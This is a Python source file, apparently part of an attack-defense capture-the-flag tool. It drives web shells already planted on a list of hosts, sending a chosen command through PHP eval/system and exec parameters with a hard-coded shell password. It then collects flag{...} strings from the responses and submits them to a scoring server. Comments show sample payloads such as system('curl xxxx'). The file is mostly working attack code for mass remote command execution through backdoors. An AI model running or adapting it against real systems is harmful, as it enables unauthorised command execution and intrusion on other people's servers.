flag.py
# -*- coding: utf-8 -*-
import requests
from core.shells import *
import re
#from core.ip_list import *
#GET_eval_shells_path_pwd = {}
#POST_eval_shells_path_pwd = {}
#GET_exec_shells_path_pwd = {}
#POST_exec_shells_path_pwd = {}
# Response bodies collected by judege(); read by show_flag() and
# submit_flag(), rebound to a fresh list by clear_flag().
flags = list()
# Empty-string placeholders. cookies/datas/url are also the values that
# submit_flag()'s default arguments capture when the function is defined.
cookies = datas = url = command = ''
# Example:POST_data={'x':"system('curl xxxx');"}
# POST_file = "system('curl xxxx');"
# Example:GET_data="echo exec('curl xxxx');"
#eval_file = "echo exec('curl xxxx');"
#exec_file = "curl xxxx"
#global GET_eval_shells_path_pwd,POST_eval_shells_path_pwd,GET_exec_shells_path_pwd,POST_exec_shells_path_pwd
# Set the command used to retrieve the flag
def set_command(command):
    """Store *command* as the payload text used by later requests.

    Two module globals are written:

    * ``eval_file`` -- ``command`` wrapped in single quotes inside a
      ``system(...);`` statement. The quoting is plain concatenation;
      nothing inside ``command`` is escaped.
    * ``exec_file`` -- ``command`` unchanged.

    ``POST_file`` is declared global but is never assigned here. The
    generated ``eval_file`` string is echoed to stdout.
    """
    global POST_file, eval_file, exec_file
    quoted = "".join(("'", command, "'"))
    eval_file = "system(%s);" % quoted
    print(eval_file)
    exec_file = command
# Check whether retrieving the flag succeeded
def judege(url, flag):
    """Record a response body in ``flags`` when the request looks successful.

    ``flag`` is a response object exposing ``status_code`` and ``text``.
    The only success criteria are HTTP 200 and a non-empty body: the body
    is not compared against any flag format here, so an error page served
    with status 200 is stored as well. A one-line result is printed for
    ``url`` in both cases.
    """
    global flags
    body = flag.text
    if flag.status_code != 200 or str(body) == '':
        print(url + " got flag failed!")
        return
    flags.append(flag.text)
    print(url + " got flag!")
# Iterate over the IP list to retrieve flags
def get_flag():
    """Send the stored command to every shell endpoint on every host in ``ipList``.

    For each host, four lookup tables are walked in turn (POST eval, GET
    eval, GET exec, POST exec). Every table is used as ``path -> parameter
    name``: the path is appended to ``http://<host>`` and the parameter
    carries ``eval_file`` or ``exec_file`` (the globals written by
    ``set_command``). Each response is handed to ``judege``, which decides
    whether to keep the body. Nothing is returned.

    All requests use plain ``http://``. Any exception raised inside a
    request block is swallowed by a bare ``except`` and reported only as
    "error".
    """
    #global GET_eval_shells_path_pwd,POST_eval_shells_path_pwd,GET_exec_shells_path_pwd,POST_exec_shells_path_pwd
    # The Get_* helpers and ipList are not defined in this file; presumably
    # they come from the star import of core.shells -- confirm.
    GET_eval_shells_path_pwd=Get_GET_eval_sap()
    POST_eval_shells_path_pwd=Get_Post_eval_sap()
    GET_exec_shells_path_pwd=Get_GET_exec_sap()
    POST_exec_shells_path_pwd=Get_POST_exec_sap()
    print GET_eval_shells_path_pwd,POST_eval_shells_path_pwd,GET_exec_shells_path_pwd,POST_exec_shells_path_pwd
    # ipList is only read below; the global declaration is not required for that.
    global ipList
    print 'this'
    #global target
    #target = open('auxi/flags.txt','w')
    for i in ipList:
        # POST eval endpoints: j is the path, the mapped value is the form field name.
        for j in POST_eval_shells_path_pwd:
            eval_POST_data={}
            # NOTE(review): this literal is sent in the body of every POST
            # eval request, so it is a fixed string that request logs or an
            # IDS rule can match on.
            eval_POST_data['pass']='Sn3rtf4ck'
            eval_POST_data[POST_eval_shells_path_pwd[j]] =eval_file
            url = "http://" + i + j
            try:
                flag = requests.post(url,data = eval_POST_data,timeout=3)
                judege(url,flag)
            except:
                # Bare except: the cause of the failure is not reported.
                print "error!"
        # GET eval endpoints: k is the path, the mapped value is the query parameter name.
        for k in GET_eval_shells_path_pwd:
            url = "http://" + i + k
            print url
            try:
                if '?' in k:
                    # NOTE(review): this is the only request without a
                    # timeout, and eval_file is concatenated into the URL
                    # as-is instead of being passed through params=.
                    flag = requests.get(url + '&' + GET_eval_shells_path_pwd[k] + "=" + eval_file)
                else:
                    payload = {GET_eval_shells_path_pwd[k]:eval_file}
                    flag = requests.get(url,params = payload,timeout=3)
                judege(url,flag)
            except:
                print "error"
        # GET exec endpoints: the raw command (exec_file) is the parameter value.
        for m in GET_exec_shells_path_pwd:
            url = "http://" + i + m
            try:
                payload = {GET_exec_shells_path_pwd[m]:exec_file}
                flag = requests.get(url,params = payload,timeout=3)
                judege(url,flag)
            except:
                print "error"
        # POST exec endpoints: the raw command (exec_file) is the form field value.
        for n in POST_exec_shells_path_pwd:
            url = "http://" + i + n
            exec_POST_data = {POST_exec_shells_path_pwd[n]:exec_file}
            try:
                flag = requests.post(url,data = exec_POST_data,timeout=3)
                judege(url,flag)
            except:
                print "error"
    #target.close()
def show_flag():
    """Print every entry of the module-level ``flags`` list, one per line."""
    for entry in flags:
        print(entry)
# Submit flags
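def submit_flag(url = url,cookies = cookies,datas = datas):
    """Submit every collected flag to ``url`` with an HTTP POST.

    Args:
        url: Endpoint that receives the submission.
        cookies: Cookie header text, ``name=value`` pairs separated by ``;``.
        datas: Form body template, ``name=value`` pairs separated by ``&``.
            The field whose value is ``?`` is replaced by the flag on each
            submission.

    The defaults are the module-level ``url``/``cookies``/``datas`` values as
    they were when this function was defined, not their current values.
    All spaces are removed from ``cookies`` and ``datas`` before parsing.

    For each entry in ``flags`` the first ``flag{...}`` match is extracted
    and posted; entries without a match are skipped. Afterwards the user is
    asked whether the collected flags should be cleared.

    Fixes over the previous version: the matched *string* is submitted
    (previously the regex match object itself was put into the form), a
    missing ``?`` placeholder is reported instead of raising on an unbound
    name, pairs are split on the first ``=`` only so values containing ``=``
    parse, empty ``cookies``/``datas`` no longer raise, the POST has a
    timeout, and only request errors are caught.
    """
    global flags

    def _parse_pairs(raw, separator):
        # Split each item on the first '=' only: cookie and form values may
        # themselves contain '=' (for example base64 padding).
        pairs = {}
        for item in raw.replace(' ', '').strip().split(separator):
            if not item:
                continue
            name, _, value = item.partition('=')
            pairs[name] = value
        return pairs

    # NOTE(review): the cookie is sent to whatever ``url`` is passed in;
    # nothing here checks that the scheme is https.
    cookie_dict = _parse_pairs(cookies, ';')
    data_dict = _parse_pairs(datas, '&')

    # Find the form field marked with '?'; the last one wins, as before.
    placeholder = None
    for name in data_dict:
        if data_dict[name] == '?':
            placeholder = name
    if placeholder is None:
        print("no '?' placeholder found in datas")
        return

    pattern = re.compile(r'flag{\w+?}')
    for i in flags:
        found = pattern.search(i)
        print(i)
        if found is None:
            # Stored bodies are not validated when collected, so an entry
            # may not contain a flag at all.
            print("submit flag failed")
            continue
        data_dict[placeholder] = found.group(0)
        try:
            a = requests.post(url,data = data_dict,cookies = cookie_dict,timeout=3)
        except requests.RequestException:
            print("something is wrong ,please check!")
            continue
        if a.status_code==200:
            print("Submit flag success")
        else:
            print("submit flag failed")

    print("ok,do you want to clear flag?")
    choice = raw_input("y/n")
    while choice not in ['y','n']:
        print("please input 'y/n'")
        choice = raw_input("y/n")
    if choice == 'y':
        clear_flag()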
def clear_flag():
    """Discard all collected flags by rebinding ``flags`` to a new empty list.

    The previous list object is left untouched, so any other reference to
    it still sees the old contents.
    """
    global flags
    flags = list()